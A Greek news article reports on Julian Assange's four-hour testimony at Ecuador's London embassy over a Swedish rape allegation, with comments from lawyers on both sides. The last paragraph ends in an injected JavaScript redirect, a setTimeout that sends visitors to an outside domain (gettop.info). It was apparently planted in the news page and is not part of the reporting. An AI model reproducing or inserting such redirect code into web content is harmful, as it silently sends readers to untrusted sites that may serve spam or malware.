Επί τέσσερις ώρες κατέθετε ο Τζ. Ασάνζ

0
4

 

Σήμερα συνεχίζεται η κατάθεση του ιδρυτή των WikiLeaks Τζούλιαν Ασάνζ που κατηγορείται για βιασμό στη Σουηδία και έχει καταφύγει τα τελευταία τέσσερα χρόνια στην πρεσβεία του Ισημερινού στο Λονδίνο. Ο Ασάνζ επέλεξε να καταφύγει στην πρεσβεία καθώς φοβόταν ότι αν οι βρετανικές αρχές συμφωνούσαν να τον εκδώσουν στη Σουηδία, υπήρχε ο κίνδυνος η Στοκχόλμη να τον παραδώσει με τη σειρά της στην Ουάσινγκτον και να καταδικαστεί από την αμερικανική δικαιοσύνη σε πολυετή κάθειρξη.

Χθες ο Ασάνζ κατέθετε επί τέσσερις ώρες ενώ η διαδικασία αναμένεται να συνεχιστεί και τις επόμενες μέρες.

Η γενική εισαγγελέας της Σουηδίας Ίνγκριντ Ίσγκρεν έθεσε ερωτήσεις στον Ασάνζ μέσω ενός εισαγγελέα του Ισημερινού και κατόπιν αποχώρησε από την πρεσβεία, χωρίς να κάνει κανένα σχόλιο στους δημοσιογράφους.

Η Μελίντα Τέιλορ, ένα μέλος της νομικής ομάδας που υπερασπίζεται τον Ασάνζ, είπε ότι οι συνεχείς αναβολές εκ μέρους των σουηδικών αρχών στέρησαν από τον πελάτη της το δικαίωμα να καθαρίσει το όνομά του.

Από την πλευρά της, η δικηγόρος Ελίζαμπεθ Φριτς, που εκπροσωπεί τη γυναίκα η οποία κατηγορεί τον 45χρονο Ασάνζ για βιασμό, θεωρεί ότι «είναι καλό που επιτέλους ακούγεται» η άποψή του. «Αναμένουμε ότι μετά την κατάθεση αυτή θα του ασκηθεί δίωξη και ότι αυτή η δίωξη θα οδηγήσει σε μια δίκη ενώπιον των σουηδικών δικαστηρίων. Η πελάτισσά μου περιμένει να αποδοθεί δικαιοσύνη εδώ και έξι χρόνια», τόνισε.

Εφόσον ο Ασάνζ συμφωνήσει, τότε θα ληφθεί DNA του για να εξεταστεί. Το απομαγνητοφωνημένο κείμενο της ανάκρισης θα δοθεί σε Σουηδούς δικαστές που θα αποφασίσουν αν θα δώσουν συνέχεια στην υπόθεση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here